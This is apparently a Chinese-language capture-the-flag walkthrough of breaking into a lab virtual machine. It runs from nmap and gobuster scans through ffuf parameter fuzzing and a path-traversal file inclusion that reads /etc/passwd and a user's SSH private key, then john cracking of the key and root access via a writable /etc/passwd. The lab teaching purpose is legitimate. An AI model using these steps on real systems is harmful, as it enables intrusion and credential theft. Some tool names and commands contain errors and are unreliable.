目录
一、主机发现
fping -gaq 192.168.43.27/24
二、端口扫描
sudo nmap -p- 192.168.43.250
22 ssh服务 80 http服务
三、强力扫描
sudo nmap -p22,80 -A 192.168.43.250
-A相当于 -sV -sC -O的总和,对服务版本,操作系统的扫描,-sC是开启默认脚本扫描
四、访问web服务
发现没啥可以利用的
五、目录扫描爆破
扫描一下,看看是否有隐藏目录
1.安装gobuster
(1)更新下源列表
apt-get update
(2)下载
apt-get install gobuster
2.下载渗透测试字典
seclists
3.开扫
(1)看看参数
我们使用这个扫目录文件参数dir的来扫,-w字典路径 -u 是url地址
(2)扫描
gobuster dir -u http://192.168.43.250/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
扫出来三个子目录
(3)对隐藏目录的扫描
有evil.php文件
六、访问加信息收集
访问一下都是啥都不显示,但是没报错,证明了此目录和文件是存在的。只是没有前端代码,但是有后端程序,猜测要有些参数提交才会执行后端程序。
七、参数爆破
参数分为两部分,一部分是参数名,一部分参数值,我们用ffuf来进行常用参数的爆破
1.准备参数值字典
自己创建一个常用参数值字典,写一些 1,2,4,5,a,b,c再加上一些特殊字符,看看有无惊喜。
2.ffuf跑一下
ffuf -u http://192.168.43.250/secret/evil.php?parm=dic -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:parm -w ./dic.txt:dic -fs
结果是啥都没哟,考虑后边可能是文件,进行模糊测试
3.模糊测试
ffuf -u http://192.168.43.250/secret/evil.php?FUZZ=../index.html -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs 0
利用已经存在的index.html进行模糊测试,跑出来
直接跑出来一个command
八、是否文件包含?
逐渐访问看是否能访问到/etc/passwd
http://192.168.43.250/secret/evil.php?command=../../../../etc/passwd
1.存在文件包含漏洞
但是这个页面乱起八糟,看的眼晕
2.python整理下格式
f = open("huanhang.txt","r") #设置文件对象
str = f.read() #将txt文件的所有内容读入到字符串str中
f.close() #将文件关闭
result=str.replace(' ','\n')
print(result)
比刚刚好点,可以看到mowree用户可以通过/bin/bash登录,尝试用mawree通过ssh登录
3.登录
ssh mowree@192.168.43.250 -v
可以看到详细信息里面有认证可以继续通过,公钥或密码,这我们知道了可以通过密钥的形式登录
九、信息收集
1.查看公私钥相应文件
这里要配合文件包含漏洞来查看公私钥文件,下面是公私钥的默认地址
公:
/home/mowree/.ssh/authorized_keys
私:
/home/mowree/.ssh/id_rsa
2.利用私钥登录
尝试利用私钥解开加密的公钥,从而通过公钥验证,登录账户
赋予权限尝试登陆,结果私钥又被加上了一道密码。
十、暴力破解id_rsa私钥的密码
1.字典
/cp /usr/share/wordlists/rockyou.txt.gz
gunzip rockyou.txt.gz
2.john工具
(1)转码
cd /usr/share/john
./ssh2join.py ~/id_rsa ~/aaa
(2)爆破
john aaa --wordlist=rockyou.txt.gz
十一、提权
成功以mowrre的身份登录,有一个flag,尝试提权
1.提权思路
(1)利用sudo -l配置缺陷
(2)uname -a 内核漏洞
(3)suid 权限继承
(4)可写入的文件
2./etc/passwd文件可写入
/etc/passwd文件可写入,所以直接修改/etc/passwd密码即可
(1)生成密码
把root的密码更改为我们生成的密码即可
openssl passwd -1 123
(2)修改/etc/passwd
删除是在vi编辑器里是x,修改成功后我们可以切换root用户了,拿到了第二个flag
flag:56Rbp0soobpzWSVzKh9YOvzGLgtPZQ